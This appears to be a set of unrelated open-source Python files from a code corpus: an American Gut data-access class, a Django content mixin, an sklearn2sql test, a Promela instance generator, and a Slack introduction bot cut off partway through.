WHERE ag_login_id = %s AND ags.survey_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id, 2])
return TRN.execute_fetchflatten()
def getParticipantSamples(self, ag_login_id, participant_name):
sql = """SELECT DISTINCT
ag_kit_barcodes.barcode,
ag_kit_barcodes.site_sampled,
ag_kit_barcodes.sample_date,
ag_kit_barcodes.sample_time,
ag_kit_barcodes.notes,
barcodes.barcode.status
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING (survey_id)
JOIN ag.ag_kit_barcodes USING (barcode)
JOIN barcodes.barcode USING (barcode)
WHERE ag_login_id = %s
AND participant_name = %s
AND (site_sampled IS NOT NULL
AND site_sampled::text <> '')"""
with TRN:
TRN.add(sql, [ag_login_id, participant_name])
rows = TRN.execute_fetchindex()
return [dict(row) for row in rows]
def getEnvironmentalSamples(self, ag_login_id):
sql = """SELECT barcode, site_sampled, sample_date, sample_time,
notes, status
FROM ag_kit_barcodes
INNER JOIN barcode USING (barcode)
INNER JOIN ag_kit USING(ag_kit_id)
WHERE (environment_sampled IS NOT NULL AND
environment_sampled::text <> '')
AND ag_login_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id])
rows = TRN.execute_fetchindex()
return [dict(row) for row in rows]
def getAvailableBarcodes(self, ag_login_id):
sql = """SELECT barcode
FROM ag_kit_barcodes
INNER JOIN ag_kit USING (ag_kit_id)
WHERE coalesce(sample_date::text, '') = ''
AND kit_verified = 'y' AND ag_login_id = %s"""
with TRN:
TRN.add(sql, [ag_login_id])
return TRN.execute_fetchflatten()
def verifyKit(self, supplied_kit_id):
"""Set the KIT_VERIFIED for the supplied_kit_id to 'y'"""
sql = """UPDATE AG_KIT
SET kit_verified='y'
WHERE supplied_kit_id=%s"""
with TRN:
TRN.add(sql, [supplied_kit_id])
def _get_unverified_kits(self):
"""Gets list of unverified kit IDs, Helper function for tests"""
sql = """SELECT supplied_kit_id
FROM AG_KIT
WHERE NOT kit_verified = 'y'"""
with TRN:
TRN.add(sql)
return TRN.execute_fetchflatten()
def getMapMarkers(self):
with TRN:
sql = """SELECT country, count(country)::integer
FROM ag.ag_login GROUP BY country"""
TRN.add(sql)
return dict(TRN.execute_fetchindex())
def handoutCheck(self, username, password):
with TRN:
password = password.encode('utf-8')
sql = "SELECT password FROM ag.ag_handout_kits WHERE kit_id = %s"
TRN.add(sql, [username])
to_check = TRN.execute_fetchindex()
if not to_check:
return False
else:
return bcrypt.checkpw(password, to_check[0][0])
def check_access(self, supplied_kit_id, barcode):
"""Check if the user has access to the barcode
Parameters
----------
supplied_kit_id : str
The user's supplied kit ID
barcode : str
The barcode to check access for
Returns
-------
boolean
True if the user can access the barcode, False otherwise
"""
with TRN:
ag_login_id = self.get_user_for_kit(supplied_kit_id)
sql = """SELECT EXISTS (
SELECT barcode
FROM ag.ag_kit
JOIN ag.ag_kit_barcodes USING (ag_kit_id)
WHERE ag_login_id = %s AND barcode = %s)"""
TRN.add(sql, [ag_login_id, barcode])
return TRN.execute_fetchlast()
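    # Hypothetical usage, assuming an instance `ag_data` of this class and a kit
    # 'DokBF' that owns barcode '000004217':
    #
    #   ag_data.check_access('DokBF', '000004217')   # -> True
    #   ag_data.check_access('DokBF', '999999999')   # -> False (not in this kit)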
def getAGKitIDsByEmail(self, email):
"""Returns a list of kitids based on email
email is email address of login
returns a list of kit_id's associated with the email or an empty list
"""
with TRN:
sql = """SELECT supplied_kit_id
FROM ag_kit
INNER JOIN ag_login USING (ag_login_id)
WHERE email = %s"""
TRN.add(sql, [email.lower()])
return TRN.execute_fetchflatten()
def ag_set_pass_change_code(self, email, kitid, pass_code):
"""updates ag_kit table with the supplied pass_code
email is email address of participant
kitid is supplied_kit_id in the ag_kit table
        pass_code is the password change verification value
"""
sql = """UPDATE ag_kit
SET pass_reset_code = %s,
pass_reset_time = clock_timestamp() + interval '2' hour
WHERE supplied_kit_id = %s AND ag_login_id in
(SELECT ag_login_id FROM ag_login WHERE email = %s)"""
with TRN:
TRN.add(sql, [pass_code, kitid, email])
def ag_update_kit_password(self, kit_id, password):
"""updates ag_kit table with password
kit_id is supplied_kit_id in the ag_kit table
password is the new password
"""
with TRN:
password = password.encode('utf-8')
password = bcrypt.hashpw(password, bcrypt.gensalt())
sql = """UPDATE AG_KIT
SET kit_password = %s, pass_reset_code = NULL
WHERE supplied_kit_id = %s"""
TRN.add(sql, [password, kit_id])
def ag_verify_kit_password_change_code(self, email, kitid, passcode):
"""returns true if it still in the password change window
email is the email address of the participant
kitid is the supplied_kit_id in the ag_kit table
passcode is the password change verification value
"""
sql = """SELECT EXISTS(SELECT pass_reset_time
FROM ag.ag_kit
INNER JOIN ag.ag_login USING (ag_login_id)
WHERE pass_reset_code = %s and email = %s
AND supplied_kit_id = %s
AND NOW() < pass_reset_time)"""
with TRN:
TRN.add(sql, [passcode, email, kitid])
return TRN.execute_fetchlast()
def getBarcodesByKit(self, kitid):
"""Returns a list of barcodes in a kit
kitid is the supplied_kit_id from the ag_kit table
"""
sql = """SELECT barcode
FROM ag_kit_barcodes
INNER JOIN ag_kit USING (ag_kit_id)
WHERE supplied_kit_id = %s"""
with TRN:
TRN.add(sql, [kitid])
return TRN.execute_fetchflatten()
def get_nonconsented_scanned_barcodes(self, kit_id):
"""Returns list of barcodes that have been scanned but not consented
Parameters
----------
kit_id : str
The supplied kit identifier to check for barcodes.
Returns
-------
list of str
The barcodes, if any, that have been scanned but not consented
"""
sql = """SELECT barcode
FROM ag_kit_barcodes
INNER JOIN ag_kit USING (ag_kit_id)
RIGHT JOIN ag_login USING (ag_login_id)
LEFT JOIN barcode USING (barcode)
FULL JOIN ag.source_barcodes_surveys USING (barcode)
WHERE ag.source_barcodes_surveys.survey_id IS NULL
AND scan_date IS NOT NULL
AND ag_login_id = %s"""
with TRN:
user = self.get_user_for_kit(kit_id)
TRN.add(sql, [user])
return TRN.execute_fetchflatten()
def checkPrintResults(self, kit_id):
"""Checks whether or not results are available for a given `kit_id`
Parameters
----------
kit_id : str
The supplied kit identifier to check for results availability.
Returns
-------
bool
Whether or not the results are ready for the supplied kit_id.
Notes
-----
If a `kit_id` does not exist this function will return False, as no
results would be available for a non-existent `kit_id`.
"""
with TRN:
sql = "SELECT print_results FROM ag_handout_kits WHERE kit_id = %s"
TRN.add(sql, [kit_id])
results = TRN.execute_fetchindex()
return False if not results else results[0][0]
def get_user_for_kit(self, supplied_kit_id):
with TRN:
sql = """SELECT ag_login_id
FROM ag.ag_kit
JOIN ag_login USING (ag_login_id)
WHERE supplied_kit_id = %s"""
TRN.add(sql, [supplied_kit_id])
results = TRN.execute_fetchindex()
if results:
return results[0][0]
else:
raise ValueError("No user ID for kit %s" % supplied_kit_id)
def get_menu_items(self, supplied_kit_id):
"""Returns information required to populate the menu of the website"""
with TRN:
ag_login_id = self.get_user_for_kit(supplied_kit_id)
info = self.getAGKitDetails(supplied_kit_id)
kit_verified = False
if info['kit_verified'] == 'y':
kit_verified = True
human_samples = {hs: self.getParticipantSamples(ag_login_id, hs)
for hs in self.getHumanParticipants(ag_login_id)}
animal_samples = {a: self.getParticipantSamples(ag_login_id, a)
for a in self.getAnimalParticipants(ag_login_id)}
environmental_samples = self.getEnvironmentalSamples(ag_login_id)
return (human_samples, animal_samples, environmental_samples,
kit_verified)
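    # The return value is a 4-tuple, so callers typically unpack it directly
    # (hypothetical usage, assuming an instance `ag_data` of this class):
    #
    #   human, animal, environmental, verified = ag_data.get_menu_items('DokBF')
    #   # human/animal map participant name -> list of sample dicts,
    #   # environmental is a list of sample dicts, verified is a bool.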
def check_if_consent_exists(self, ag_login_id, participant_name):
"""Return True if a consent already exists"""
with TRN:
sql = """SELECT EXISTS(
SELECT 1
FROM ag_consent
WHERE ag_login_id = %s AND participant_name = %s)"""
TRN.add(sql, [ag_login_id, participant_name])
return TRN.execute_fetchlast()
def get_user_info(self, supplied_kit_id):
with TRN:
sql = """SELECT CAST(ag_login_id AS VARCHAR(100)) AS ag_login_id,
email, name, address, city, state, zip, country
FROM ag_login
INNER JOIN ag_kit USING(ag_login_id)
WHERE supplied_kit_id = %s"""
TRN.add(sql, [supplied_kit_id])
row = TRN.execute_fetchindex()
if not row:
raise ValueError('Supplied kit id is not in DB: %s' %
supplied_kit_id)
user_data = dict(row[0])
user_data['ag_login_id'] = str(user_data['ag_login_id'])
return user_data
def get_barcode_results(self, supplied_kit_id):
"""Get the results associated with the login ID of the kit
Parameters
----------
supplied_kit_id : str
The user's supplied kit ID
Returns
-------
list of dict
            A list of dicts mapping barcode to participant name for the login
            ID, limited to barcodes whose results are ready.
"""
with TRN:
ag_login_id = self.get_user_for_kit(supplied_kit_id)
sql = """SELECT DISTINCT barcode, participant_name
FROM ag.ag_login_surveys
JOIN ag.source_barcodes_surveys USING (survey_id)
JOIN ag.ag_kit_barcodes USING (barcode)
WHERE ag_login_id = %s AND results_ready = 'Y'"""
TRN.add(sql, [ag_login_id])
return [dict(row) for row in TRN.execute_fetchindex()]
def get_login_info(self, ag_login_id):
"""Get kit registration information
Parameters
----------
ag_login_id : str
            A valid login ID; should be a valid UUID
Returns
-------
list of dict
A list of registration information associated with a common login
ID.
Raises
------
ValueError
Unknown ag_login_id passed
"""
with TRN:
sql = """SELECT ag_login_id, email, name, address, city, state,
zip, country
FROM ag_login
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('ag_login_id not in database: %s' %
ag_login_id)
return [dict(row) for row in info]
def get_survey_ids(self, ag_login_id, participant_name):
"""Return the survey IDs associated with a participant or None
Parameters
----------
ag_login_id : str
            A valid login ID; should be a valid UUID
participant_name : str
A participant name
Returns
-------
        dict
            The participant's survey IDs, keyed by the survey (template) ID
            from ag.surveys.
Raises
------
ValueError
Unknown ag_login_id or participant_name passed
"""
with TRN:
sql = """SELECT DISTINCT s.survey_id, als.survey_id
FROM ag.ag_login_surveys als
LEFT JOIN ag.survey_answers sa USING (survey_id)
LEFT JOIN ag.group_questions gq USING (survey_question_id)
LEFT JOIN ag.surveys s USING (survey_group)
WHERE ag_login_id=%s AND participant_name=%s"""
TRN.add(sql, [ag_login_id, participant_name])
survey_id = TRN.execute_fetchindex()
if not survey_id:
raise ValueError("No survey ID found!")
return dict(i for i in survey_id)
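    # Shape of the return value (hypothetical IDs; keys are the survey template
    # IDs from ag.surveys, values are the participant's survey instance IDs):
    #
    #   ag_data.get_survey_ids(login_id, 'Jane')
    #   # -> {1: 'aAbBcCdDeEfFgGhH', 2: 'iIjJkKlLmMnNoOpP'}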
def get_participants_surveys(self, ag_login_id, participant_name,
locale='american'):
"""Returns all surveys (except external) for one participant for a
AG login.
Parameters
----------
ag_login_id : str
            A valid login ID; should be a valid UUID.
participant_name : str
A participant name.
locale : str
            The names for the surveys are fetched from table ag.survey_group.
            For localization, that table has one column per language; locale
            selects which column is used.
Returns
-------
        list of lists
            A list of surveys for the given participant of the given
            ag_login_id. Each element is itself a list [int, str, str], where
            the first element is the survey group id, the second the survey_id
            and the third a human-readable name for the survey.
Raises
------
ValueError
Unknown ag_login_id or participant_name passed
"""
with TRN:
sql = """SELECT DISTINCT gq.survey_group, als.survey_id, sg.{0}
FROM ag.ag_login_surveys als
LEFT JOIN ag.survey_answers sa USING (survey_id)
LEFT JOIN ag.group_questions gq USING (survey_question_id)
LEFT JOIN ag.survey_group sg ON (survey_group=group_order)
WHERE als.ag_login_id = %s AND als.participant_name = %s
AND gq.survey_group < 0""".format(locale)
TRN.add(sql, [ag_login_id, participant_name])
surveys = TRN.execute_fetchindex()
if not surveys:
raise ValueError("No survey IDs found!")
return surveys
def get_new_survey_id(self):
"""Return a new unique survey ID
Notes
-----
This is *NOT* atomic. At the creation of this method, it is not
possible to store a survey ID without first storing consent. That
would require a fairly large structural change. This method replaces
the existing non-atomic logic, with logic that is much safer but not
perfect.
Returns
-------
str
A unique survey ID
"""
alpha = string.ascii_letters + string.digits
with TRN:
sql = """SELECT survey_id
FROM ag.ag_login_surveys"""
TRN.add(sql)
existing = {i for i in TRN.execute_fetchflatten()}
new_id = ''.join([random.choice(alpha) for i in range(16)])
while new_id in existing:
new_id = ''.join([random.choice(alpha) for i in range(16)])
return new_id
def get_countries(self):
"""
Returns
-------
list of str
All country names in database"""
with TRN:
sql = 'SELECT country FROM ag.iso_country_lookup ORDER BY country'
TRN.add(sql)
return TRN.execute_fetchflatten()
def is_deposited_ebi(self, barcode):
"""Check if barcode is deposited to EBI
Parameters
----------
barcode : str
Barcode to check
Returns
-------
bool
If the barcode has been deposited (True) or has not (False)
Raises
------
ValueError
            Barcode is not a registered AG barcode
"""
with TRN:
sql = """SELECT EXISTS(
SELECT 1 FROM ag.ag_kit_barcodes WHERE barcode = %s)"""
TRN.add(sql, [barcode])
if not TRN.execute_fetchlast():
raise ValueError('Barcode %s not a registered AG barcode' %
barcode)
sql = "SELECT deposited FROM ag.ag_kit_barcodes WHERE barcode = %s"
TRN.add(sql, [barcode])
return TRN.execute_fetchlast()
# following are DB access functions only used for unit testing:
def ut_get_arbitrary_supplied_kit_id_scanned_unconsented(self):
""" Returns arbitrarily chosen supplied_kit_id and barcode which has
been scanned but is without consent.
For unit testing only!
Returns
-------
list of str: [supplied_kit_id, barcode]
example: ['fNIYa', '000001053']
Raises
------
ValueError
If no kits can be found in the DB that have been scanned and
are without consent."""
with TRN:
sql = """SELECT supplied_kit_id, barcode
FROM barcodes.barcode
JOIN ag.ag_kit_barcodes USING (barcode)
JOIN ag.ag_kit USING (ag_kit_id)
LEFT JOIN ag.source_barcodes_surveys USING (barcode)
WHERE barcodes.barcode.scan_date IS NOT NULL
AND ag.source_barcodes_surveys.survey_id IS NULL
LIMIT 1"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No kits found.')
return info[0]
def ut_get_arbitrary_handout_printed_min6_supplied_kit_id(self):
""" Returns a arbitrarily chosen supplied_kit_id with printed results
and 6 swaps per kit.
For unit testing only!
Returns
-------
supplied_kit_id : str
A supplied_kit_id. Example: 'DS_ubdvq'
Raises
------
ValueError
            If no handout kit exists satisfying the given conditions."""
with TRN:
sql = """SELECT kit_id
FROM ag.ag_handout_kits
WHERE swabs_per_kit = 6 AND print_results = TRUE"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No kits found.')
return info[0][0]
def ut_get_arbitrary_email(self):
""" Return arbitrarily chosen email.
For unit testing only!
Returns
-------
str: email
Example: 'a03E9u6ZAu@glA+)./Vn'
Raises
------
ValueError
            If no emails can be found in the DB."""
with TRN:
sql = """SELECT email
FROM ag.ag_login
LIMIT 1"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No emails found.')
return info[0][0]
def ut_get_arbitrary_barcode(self, deposited=True):
""" Returns arbitrarily chosen barcode.
For unit testing only!
Parameters
----------
deposited : boolean
If true, pick a deposited barcode. Default = True
Returns
-------
str: barcode
Example: '000032951'
Raises
------
ValueError
If no barcodes can be found in the DB."""
with TRN:
sql = """SELECT barcode
FROM ag.ag_kit_barcodes
WHERE deposited=%s
LIMIT 1"""
TRN.add(sql, [deposited])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No barcodes found.')
return info[0][0]
def ut_get_email_from_ag_login_id(self, ag_login_id):
""" Returns email for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
str: email
Example: 'xX/tEv7O+T@6Ri7C.)LO'
Raises
------
ValueError
If ag_login_id is not in DB.
"""
with TRN:
sql = """SELECT email
FROM ag.ag_login
WHERE ag_login_id=%s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No emails found.')
return info[0][0]
def ut_get_supplied_kit_id(self, ag_login_id):
""" Returns supplied_kit_id for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
str
The supplied_kit_id for the given ag_login_id.
Example: 'DokBF'
Raises
------
ValueError
If ag_login_id is not in DB.
"""
with TRN:
sql = """SELECT supplied_kit_id
FROM ag.ag_kit
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('ag_login_id not in database: %s' %
ag_login_id)
return info[0][0]
def ut_get_participant_names_from_ag_login_id(self, ag_login_id):
""" Returns all participant_name(s) for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
[[str]]
Example: ["Name - z\xc3\x96DOZ8(Z~'",
"Name - z\xc3\x96DOZ8(Z~'",
'Name - QpeY\xc3\xb8u#0\xc3\xa5<',
'Name - S)#@G]xOdL',
'Name - Y5"^&sGQiW',
'Name - L\xc3\xa7+c\r\xc3\xa5?\r\xc2\xbf!',
'Name - (~|w:S\xc3\x85#L\xc3\x84']
Raises
------
ValueError
If ag_login_id is not in DB.
"""
with TRN:
sql = """SELECT participant_name
FROM ag.ag_login_surveys
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('ag_login_id not in database: %s' %
ag_login_id)
return [n[0] for n in info]
def ut_get_barcode_from_ag_login_id(self, ag_login_id):
""" Returns all barcodes for a given ag_login_id.
For unit testing only!
Parameters
----------
ag_login_id : str
Existing ag_login_id.
Returns
-------
[dict(str, str)]
Example: [{'sample_time': None,
'sample_date': None,
'barcode': '000004217',
'site_sampled': None,
'kit_verified': 'y'}
Raises
------
ValueError
If no barcodes can be found in the DB.
"""
with TRN:
sql = """SELECT ag.ag_kit_barcodes.sample_time,
ag.ag_kit_barcodes.barcode,
ag.ag_kit_barcodes.sample_date,
ag.ag_kit_barcodes.site_sampled,
ag.ag_kit.kit_verified
FROM ag.ag_kit_barcodes
JOIN ag.ag_kit USING (ag_kit_id)
WHERE ag_login_id = %s"""
TRN.add(sql, [ag_login_id])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('barcode not in database: %s' %
ag_login_id)
return [dict(row) for row in info]
def ut_get_arbitrary_supplied_kit_id_unverified(self):
""" Returns a randomly chosen supplied_kit_id that is unverified.
For unit testing only!
Returns
-------
str: supplied_kit_id
Example: 'FajNh'
Raises
------
ValueError
If no unverified supplied_kit_id can be found in the DB.
"""
with TRN:
sql = """SELECT supplied_kit_id
FROM ag.ag_kit
WHERE ag.ag_kit.kit_verified = 'n'
LIMIT 1"""
TRN.add(sql, [])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('No unverified kits in DB')
return info[0][0]
def ut_get_ag_login_id_from_barcode(self, barcode):
""" Returns ag_login_id for a given barcode.
For unit testing only!
Parameters
----------
barcode : str
The barcode for which the ag_login_id should be retrieved.
Returns
-------
str: ag_login_id
Example: 'd8592c74-9694-2135-e040-8a80115d6401'
Raises
------
ValueError
If the given barcode can not be found in the DB.
"""
with TRN:
sql = """SELECT ag.ag_kit.ag_login_id
FROM ag.ag_kit_barcodes
JOIN ag.ag_kit USING (ag_kit_id)
WHERE ag.ag_kit_barcodes.barcode = %s"""
TRN.add(sql, [barcode])
info = TRN.execute_fetchindex()
if not info:
raise ValueError('Barcode "%s" not in DB' % barcode)
return info[0][0]
|
biocore/american-gut-web
|
amgut/lib/data_access/ag_data_access.py
|
Python
|
bsd-3-clause
| 57,541
|
# coding: utf-8
from django.db import models
from django.utils.translation import ugettext_lazy as _, pgettext_lazy
class ContentBase(models.Model):
"""
Base class for models that share content attributes
The attributes added by this mixin are ``title``, ``description``,
``content`` and ``is_visible``.
Attributes:
:is_visible: whether the content should be displayed by normal users
:title: title of the content, at most 192 characters
:description: most content objects have a description, with an unlimited size
:content: actual content of the object, with an unlimited size
"""
# Fields
is_visible = models.BooleanField(default=True, verbose_name=pgettext_lazy('content', "visible"))
title = models.CharField(blank=False, max_length=192, verbose_name=_("title"))
description = models.TextField(blank=True, verbose_name=_("description"))
content = models.TextField(blank=False, verbose_name=_("content"))
# Metadata
class Meta:
abstract = True
def save(self, *args, **kwargs):
""" Save the object to the database """
        # Use the concrete base class explicitly: super(self.__class__, ...)
        # recurses infinitely as soon as a subclass inherits this save().
        super(ContentBase, self).save(*args, **kwargs)
|
artscoop/django-basemix
|
basemix/mixins/content/content.py
|
Python
|
bsd-3-clause
| 1,190
|
from sklearn2sql_heroku.tests.classification import generic as class_gen
class_gen.test_model("RidgeClassifier" , "FourClass_100" , "oracle")
|
antoinecarme/sklearn2sql_heroku
|
tests/classification/FourClass_100/ws_FourClass_100_RidgeClassifier_oracle_code_gen.py
|
Python
|
bsd-3-clause
| 144
|
#!/usr/bin/env python
"""Dump instances for bunny, in Promela and SlugsIn."""
import argparse
import itertools
import pprint
import logging
import re
from tugs import utils
log = logging.getLogger(__name__)
INPUT_FILE = 'bunny.pml'
PROMELA_PATH = 'pml/bunny_many_goals_{i}.txt'
SLUGSIN_PATH = 'slugsin/bunny_many_goals_{i}.txt'
def dump_promela(n, m):
"""Dump instances of Promela."""
for i in xrange(n, m):
code = make_promela(i)
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'w') as f:
f.write(code)
log.info('dumped Promela for {i} masters'.format(i=i))
def dump_slugsin(n, m):
for i in xrange(n, m):
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
slugsin_file = SLUGSIN_PATH.format(i=i)
with open(slugsin_file, 'w') as f:
f.write(slugsin_code)
log.info('dumped SlugsIn for {i} masters'.format(i=i))
def make_promela(n):
"""Return Promela code for instance with size `n`."""
fname = INPUT_FILE
with open(fname, 'r') as f:
s = f.read()
# set number of cells
newline = '#define H {n}'.format(n=n)
code = re.sub('#define H.*', newline, s)
newline = '#define W {m}'.format(m=n-1)
code = re.sub('#define W.*', newline, code)
# add multiple weak fairness assumptions
code += form_progress(n)
return code
def form_progress(n):
"""Return conjunction of LTL formulae for progress."""
g0 = ('[]<>((x == 0) && (y == {k}))'.format(k=k)
for k in xrange(n))
g1 = ('[]<>((x == {n}) && (y == {k}))'.format(k=k, n=n)
for k in xrange(n))
c = itertools.chain(g0, g1)
prog = ' && '.join(c)
return 'assert ltl { ' + prog + ' }'
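# For example, form_progress(2) returns the single-line assertion below (wrapped
# here for readability):
#
#   assert ltl { []<>((x == 0) && (y == 0)) && []<>((x == 0) && (y == 1)) &&
#                []<>((x == 2) && (y == 0)) && []<>((x == 2) && (y == 1)) }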
def main():
# log
fh = logging.FileHandler('code_generator_log.txt', mode='w')
log.addHandler(fh)
log.setLevel(logging.DEBUG)
# tugs log
log1 = logging.getLogger('tugs.utils')
log1.addHandler(fh)
log1.setLevel(logging.DEBUG)
# record env
versions = utils.snapshot_versions()
log.info(pprint.pformat(versions))
# args
p = argparse.ArgumentParser()
p.add_argument('--min', type=int,
help='from this # of masters')
p.add_argument('--max', type=int,
help='to this # of masters')
args = p.parse_args()
n = args.min
m = args.max + 1
dump_promela(n, m)
dump_slugsin(n, m)
if __name__ == '__main__':
main()
|
johnyf/gr1experiments
|
examples/bunny_many_goals/make_instances.py
|
Python
|
bsd-3-clause
| 2,595
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Business logic - gets request in from Slack, does stuff, sends requests back to Slack.
Notes for developers who want to add or change functionality: You're in the right module.
* If you were to run this behind a server (Flask would work well) instead of behind AWS Lambda,
it would be quite easy. Make your server take a request from Slack. You are responsible
all the way up to parsing Slack's request parameters so they are a tidy dict.
This module - handle_slack_request, specifically - will take it from there.
* If you were to port to another messaging client, this is the "guts" that you would port.
"""
import json
import random
import slacker
from funcy import memoize, retry
import yobot_config_and_secrets
from messages import get_introduction_message, generate_random_introduction_text
#=============================#
# Configuration #
#=============================#
#TODO(hangtwenty) I want to redo all this config stuff. Probably port to Flask/Zappa, and let those conventions guide.
# Since we expect users to freely modify the yobot_config_and_secrets file, let's eagerly
# affirm that these attributes are set.
# also aliasing them because "YOBOT_" namespacing not needed in this file's code...
BOT_USER_NAME = yobot_config_and_secrets.YOBOT_BOTUSER_NAME
BOT_USER_TOKEN = yobot_config_and_secrets.YOBOT_BOTUSER_TOKEN
SLACK_WEBHOOK_TOKEN = yobot_config_and_secrets.YOBOT_WEBHOOK_TOKEN
SLACK_SLASHCOMMAND_TOKEN = yobot_config_and_secrets.YOBOT_SLASHCOMMAND_TOKEN
BROADCAST_CHANNEL_NAME = yobot_config_and_secrets.YOBOT_BROADCASTCHANNEL_NAME
DEBUG = yobot_config_and_secrets.YOBOT_DEBUG
if unicode(DEBUG).lower() == "false":
DEBUG = False
WEBHOOK = 'webhook'
SLASHCOMMAND = 'slash_command'
AUTH_TOKENS_EXPECTED_BY_REQUEST_TYPE = {
WEBHOOK: SLACK_WEBHOOK_TOKEN,
SLASHCOMMAND: SLACK_SLASHCOMMAND_TOKEN
}
SENSITIVE_TOKENS_TO_SANITIZE = (SLACK_SLASHCOMMAND_TOKEN, BOT_USER_TOKEN, SLACK_WEBHOOK_TOKEN)
COMMAND_BROADCAST = "broadcast"
SLACK_CALL_EXPECTED_KEYS_COMMON = [
'token',
'team_id',
'team_domain',
'channel_id',
'channel_name',
'user_id',
'user_name',
# 'timestamp',
# 'text',
# btw - does not include 'command' or 'trigger_word' because those are exclusive to
# Slash Command or Webhook request APIs specifically.
]
FIELDNAME_USER_ID = 'id'
FIELDNAME_USER_NAME = 'name'
NULLHANDLE = "nullhandle" # defined by Slack, it seems
#=============================================#
# Slack-coupled implementation of yobot logic #
#=============================================#
@memoize
def get_slack_api():
slack_api = slacker.Slacker(BOT_USER_TOKEN)
return slack_api
@retry(2)
def handle_slack_request(params_from_slack_request):
""" Main entry point. Validate input, authenticate caller, route to handler.
:param params_from_slack_request:
:return: can be a few kinds of output; this CAN be returned to Slack and shown to end-user
so do NOT put any sensitive stuff in it ;)
"""
_validate_config_or_die()
_validate_input_from_slack_or_die(params_from_slack_request)
get_slack_request_type_and_authenticate(params_from_slack_request)
slack_request_type = get_slack_request_type(params_from_slack_request)
optional_command = ""
if slack_request_type == SLASHCOMMAND:
optional_command += " " + params_from_slack_request.get(u'command')
optional_command += " " + params_from_slack_request.get(u'text', u'<None>')
if COMMAND_BROADCAST in optional_command:
        # broadcast() posts the message and returns the displayable summary;
        # calling it once avoids sending the introduction twice.
        displayable_result = broadcast()
else:
# default command.
displayable_result = random_introduction(params_from_slack_request)
    # XXX(hangtwenty) bit of an odd case I don't understand:
    # if the incoming call was a Webhook rather than a /slashcommand,
    # at this point in the flow we've executed the command for them, but we don't want to return a string
    # (if you do, it seems to only return 1 letter to the user, a bit ugly?).
    # Anyway I found out (back in the Hackathon) that if we return True, it 'just works' in this case. I'd like to understand why.
if get_slack_request_type(params_from_slack_request) == WEBHOOK:
displayable_result = True
return displayable_result
def broadcast():
""" Yobot broadcasts and introductory message to the broadcast channel (probably #general or #random).
"""
slack_api = get_slack_api()
broadcast_channel_name = BROADCAST_CHANNEL_NAME
try:
slack_api.chat.post_message(
broadcast_channel_name,
get_introduction_message(),
as_user=BOT_USER_NAME,
)
except Exception as e:
raise Exception(
e.message + " ... broadcast_channel_name = {}".format(broadcast_channel_name))
displayable_result = u"yobot introduced herself to {}".format(broadcast_channel_name)
return displayable_result
def random_introduction(params_from_slack_request):
""" Handle the plain `/yobot` case where someone wants a random introduction/prompt.
"""
slack_api = get_slack_api()
user_id_who_called_yobot = params_from_slack_request['user_id']
if not user_id_who_called_yobot:
raise ValueError("Can't message you: no user_id specified.")
users_list_response = slack_api.users.list()
users = users_list_response.body['members']
user_to_introduce = choose_a_user(users)
introduce_username = user_to_introduce.get(FIELDNAME_USER_NAME, None)
introduce_readable_name = _get_readable_name(user_to_introduce)
if not introduce_readable_name:
raise ValueError("Somehow the user I chose has NO real_name, username, or email. "
"This should never happen but it did.")
msg = generate_random_introduction_text(
introduce_readable_name,
introduce_username,
introducing_to_oneself=(user_id_who_called_yobot == user_to_introduce[FIELDNAME_USER_ID]))
if DEBUG:
debug_msg = _get_debug_message(params_from_slack_request)
msg = debug_msg + msg
# ensure-open a direct-message channel with the user who called, then message them
channel_im_with_caller = slack_api.im.open(user=user_id_who_called_yobot).body['channel']['id']
slack_api.chat.post_message(
channel_im_with_caller,
msg,
as_user=BOT_USER_NAME,
)
displayable_result = \
u"{as_user} just sent you a private message. Take a look.".format(
as_user=BOT_USER_NAME, introduce_username=introduce_username)
return displayable_result
class TargetUserInvalidException(ValueError):
""" Raised when a user isn't good to message, for our purposes.
"""
@retry(10, errors=TargetUserInvalidException)
def choose_a_user(users):
""" Chose a user from list (pseudo)randomly. Raise exception if deleted or has no username.
@retry decorator means normally exception won't reach end-user; we'll keep choosing up to
N times until we find a good one.
:param users: list of user-type JSON objects from Slack api (like users.list API method)
:return: a single user-type JSON object
"""
introduce_user = random.choice(users)
_debug_user_string = u"This user (id={} and email={}) ".format(
introduce_user.get(FIELDNAME_USER_ID, None),
introduce_user.get('email', None))
if introduce_user[FIELDNAME_USER_NAME] == NULLHANDLE:
# This can happen, it's seemingly when someone registered sorta but didn't finish.
raise TargetUserInvalidException(
u"{} has a null username ({!r}).".format(_debug_user_string, NULLHANDLE))
if introduce_user['deleted']:
raise TargetUserInvalidException("{} has been deleted.".format(_debug_user_string))
return introduce_user
def _get_readable_name(user):
""" Try to get a name besides the @handle, hopefully readable (like their real name).
    Falls back to their email, Skype username, and finally the @handle if no real name is listed.
:param user: the user-type JSON object from Slack API.
:return:
"""
username = user[FIELDNAME_USER_NAME]
profile = user['profile']
real_name = profile.get('real_name', None)
email = profile.get('email', None)
skype = profile.get('skype', None)
if skype:
leftward_arrow_emoji = u"⬅️"
skype = u"{} ({} Skype username)".format(skype, leftward_arrow_emoji)
introduce_readable_name = real_name or email or skype or username
